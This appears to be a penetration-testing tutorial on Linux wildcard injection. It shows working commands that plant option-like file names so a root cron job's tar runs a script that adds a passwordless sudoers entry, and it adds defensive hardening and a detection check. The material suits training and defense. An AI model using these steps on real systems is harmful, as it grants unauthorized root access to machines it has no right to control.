Examples of wild cards
| Character | Significance |
|---|---|
| * | An asterisk that can match any number of characters in a file name. |
| ? | Matches a single character. |
| [ ] | Brackets enclose characters and can match any single one at the defined position. |
| ~ | A tilde at the beginning expands to the name of the user home directory or can have another username appended to refer to that user's home directory. |
| - | A hyphen within brackets will denote a range of characters. |
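To make the table concrete, here is an added shell example (not part of the original page) that expands each wildcard against a small set of constructed file names in a temporary directory. Two of the constructed names, `-v` and `--help`, look like command-line options on purpose: the example shows that `*` matches them like any other name, which is the shell behaviour the rest of the page builds on. The fixture directory, file names and helper functions are all assumptions made for this demo.

```shell
#!/bin/sh
# Added example (not from the original page): exercise the wildcard characters
# from the table above against a constructed set of file names in a temporary
# directory. The names are constructed for this demo; "-v" and "--help" are
# deliberately option-looking.
export LC_ALL=C   # fixed collation so expansion order is predictable

# Create the fixture directory and print its path.
make_fixture() {
    dir=$(mktemp -d) || exit 1
    for f in report1.txt report2.txt reportA.txt notes.md -v --help; do
        : > "$dir/$f"
    done
    printf '%s\n' "$dir"
}

# Expand PATTERN inside DIR exactly as the shell would on a command line and
# print the resulting words on one line. A pattern that matches nothing is
# left as-is, which is the default shell behaviour.
expand_in() {
    dir=$1
    pattern=$2
    ( cd "$dir" && eval "set -- $pattern" && echo "$*" )
}

demo() {
    d=$(make_fixture)
    printf '%-16s -> %s\n' 'report?.txt'     "$(expand_in "$d" 'report?.txt')"
    printf '%-16s -> %s\n' 'report[12].txt'  "$(expand_in "$d" 'report[12].txt')"
    printf '%-16s -> %s\n' 'report[0-9].txt' "$(expand_in "$d" 'report[0-9].txt')"
    printf '%-16s -> %s\n' 'report[A-Z].txt' "$(expand_in "$d" 'report[A-Z].txt')"
    printf '%-16s -> %s\n' '~'               "$(expand_in "$d" '~')"
    # '*' matches every non-hidden name, the option-looking ones included:
    printf '%-16s -> %s\n' '*'               "$(expand_in "$d" '*')"
    rm -rf "$d"
}

demo
```

Note that the expansion happens in the shell before any program is started, so a program that is handed the result of `*` receives `--help` and `-v` as ordinary arguments and has no way to know they were file names.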
An example of how wildcards can be abused for privilege escalation is the tar command, a common program for creating/extracting archives. If we look at the man page for the tar command, we see the following:

xyz_student@NIX02:~$ man tar

<SNIP>

Informative output

--checkpoint[=N]
    Display progress messages every Nth record (default 10).

--checkpoint-action=ACTION
    Run ACTION on each checkpoint.
The --checkpoint-action option permits an EXEC action to be executed when a checkpoint is reached (i.e., it runs an arbitrary operating system command once the tar command executes). Because the shell expands the wildcard into file names before tar starts, tar cannot tell a file name that begins with -- apart from a genuine option. By creating files with these names, --checkpoint-action=exec=sh root.sh is passed to tar as a command-line option whenever the wildcard is expanded.
Consider the following cron job, which is set up to back up the /root directory's contents and create a compressed archive in /tmp. The cron job is set to run every minute, so it is a good candidate for privilege escalation.

#
# mh dom mon dow command
*/01 * * * * cd /tmp && tar -zcf /tmp/backup.tar.gz *
With the above in mind, we can leverage the wild card in the cron job by writing out the necessary commands as file names. When the cron job runs, these file names will be interpreted as arguments and execute any commands that we specify.
xyz_student@NIX02:~$ echo 'echo "cliff.moore ALL=(root) NOPASSWD: ALL" >> /etc/sudoers' > root.sh
xyz_student@NIX02:~$ echo "" > "--checkpoint-action=exec=sh root.sh"
xyz_student@NIX02:~$ echo "" > --checkpoint=1
Check and see that the necessary files were created.
xyz_student@NIX02:~$ ls -la

total 56
drwxrwxrwt 10 root        root        4096 Aug 31 23:12 .
drwxr-xr-x 24 root        root        4096 Aug 31 02:24 ..
-rw-r--r--  1 root        root         378 Aug 31 23:12 backup.tar.gz
-rw-rw-r--  1 cliff.moore cliff.moore    1 Aug 31 23:11 --checkpoint=1
-rw-rw-r--  1 cliff.moore cliff.moore    1 Aug 31 23:11 --checkpoint-action=exec=sh root.sh
drwxrwxrwt  2 root        root        4096 Aug 31 22:36 .font-unix
drwxrwxrwt  2 root        root        4096 Aug 31 22:36 .ICE-unix
-rw-rw-r--  1 cliff.moore cliff.moore   60 Aug 31 23:11 root.sh
Once the cron job runs again, we can check for the newly added sudo privileges and sudo to root directly.
xyz_student@NIX02:~$ sudo -l

Matching Defaults entries for cliff.moore on NIX02:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User cliff.moore may run the following commands on NIX02:
    (root) NOPASSWD: ALL
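The fix, and the check an administrator would run, follow directly from the mechanism above: the cron line is only exploitable because a bare `*` lets file names reach tar as options. Here is an added shell example (not part of the original page) that shows the argument list tar would receive from the cron job as written versus two hardened spellings (`./*`, and `-C DIR .` with no wildcard at all), and a small check that lists entries whose names begin with `-` in any directory a cron job globs over. The directory is constructed in a temp location with the same file names the walkthrough creates; tar itself is never executed, and all function names are assumptions made for this demo.

```shell
#!/bin/sh
# Added example (not from the original page): show the argument list the cron
# job above really hands to tar, with the wildcard written the vulnerable way
# (bare *) and two hardened ways (./* and -C DIR .), plus a check that flags
# entries whose names a bare wildcard would turn into options. The directory
# is constructed here with the file names from the walkthrough; tar is never run.
export LC_ALL=C   # fixed collation so expansion order is predictable

# Build a stand-in for the /tmp directory from the walkthrough and print its path.
make_backup_dir() {
    dir=$(mktemp -d) || exit 1
    : > "$dir/data.txt"
    : > "$dir/root.sh"
    : > "$dir/--checkpoint=1"
    : > "$dir/--checkpoint-action=exec=sh root.sh"
    printf '%s\n' "$dir"
}

# Print each word of a command line on its own line, exactly as the program
# would see it in argv (used here instead of running tar).
show_argv() {
    printf '%s\n' "$@"
}

# Count the operands that tar's option parser would treat as options for a
# given way of writing the cron line. FORM is one of:
#   vulnerable  ->  tar -zcf backup.tar.gz *          (the cron job as written)
#   dotslash    ->  tar -zcf backup.tar.gz ./*        (every name starts with ./)
#   chdir       ->  tar -zcf backup.tar.gz -C DIR .   (no wildcard at all)
count_option_like_operands() {
    dir=$1
    form=$2
    ( cd "$dir" || exit 1
      case $form in
          vulnerable) set -- * ;;
          dotslash)   set -- ./* ;;
          chdir)      set -- . ;;
          *)          echo "unknown form: $form" >&2; exit 1 ;;
      esac
      n=0
      for a in "$@"; do
          case $a in -*) n=$((n + 1)) ;; esac
      done
      echo "$n" )
}

# Defensive check: list entries in DIR whose names begin with '-'. Run it
# against any directory a cron job globs over. The loop uses ./* so the check
# is itself immune to the problem it looks for.
find_option_like_names() {
    ( cd "$1" || exit 1
      for f in ./*; do
          case ${f#./} in -*) printf '%s\n' "${f#./}" ;; esac
      done )
}

demo() {
    d=$(make_backup_dir)
    echo "== argv with a bare * (cron job as written) =="
    ( cd "$d" && show_argv tar -zcf backup.tar.gz * )
    echo "== argv with ./* (hardened) =="
    ( cd "$d" && show_argv tar -zcf backup.tar.gz ./* )
    echo "== option-like names in $d =="
    find_option_like_names "$d"
    rm -rf "$d"
}

demo
```

A hardened cron line reads either `cd /tmp && tar -zcf /tmp/backup.tar.gz ./*` or `tar -zcf /tmp/backup.tar.gz -C /tmp .`; in both forms the option-looking files are still archived, but every operand now starts with `.` rather than `-`, so tar never parses a file name as an option. Scheduling the check function against directories that root-owned cron jobs read from gives an early warning when such names appear.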